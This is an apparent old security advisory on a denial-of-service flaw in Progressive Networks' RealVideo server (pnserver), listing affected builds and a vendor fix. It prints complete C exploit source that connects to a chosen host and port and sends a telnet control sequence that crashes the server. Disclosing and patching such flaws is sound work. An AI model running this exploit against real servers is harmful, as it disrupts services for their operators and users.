COMMAND
pnserver
SYSTEMS AFFECTED
4.0.0.0-rvserver-build-68, Solaris 2.x, Revision: 1.91.2.4
5.0-rvserver-build-261, NT 3.5.x, Revision: 1.94.2.175
5.0-rvserver-build-262, Linux 1.2.x, Revision: 1.94.2.176
PROBLEM
Flooding the server with pages of garbage was not the true
problem. When you filled the telnet client's buffer it sent 6
characters that crash the server when its own maxbuffer is
reached. Here is a working exploit.
s0niC found following. He caused a real audio server crash by
connecting via telnet to the server, then proceeding to paste
about 30 lines to the server then quit the telnet session.
Here is an actual exploit.
/*
* pnserver exploit [1/15/98]
*
* Crash's Progressive Networks Real Video Server [ http://www.real.com/ ]
*
* Rootshell [ http://www.rootshell.com/ ]
*
* Compiled under linux.
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
void main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *hp;
char buffer[6];
int sock;
if (argc != 3) {
printf("usage: %s <rvserver_host> <port>\n\nNote: Try port 7070.\n\n", argv[0]);
exit(1);
}
hp = gethostbyname(argv[1]);
if (hp==NULL) {
printf("Unknown host: %s\n",argv[1]);
exit(1);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(atoi(argv[2]));
sock = socket(AF_INET, SOCK_STREAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
sprintf(buffer, "%c%c%c%c%c", 255, 244, 255, 253, 6);
write(sock, &buffer[0], strlen(buffer));
close(sock);
}
SOLUTION
A fix for this denial of service attack is now available at:
http://service.real.com/help/faq/serv501.html
It is recommend that RealServer 4.0 and 5.0 users on Windows NT
and UNIX platforms update their RealServers. This issue does not
affect 3.0 or earlier servers.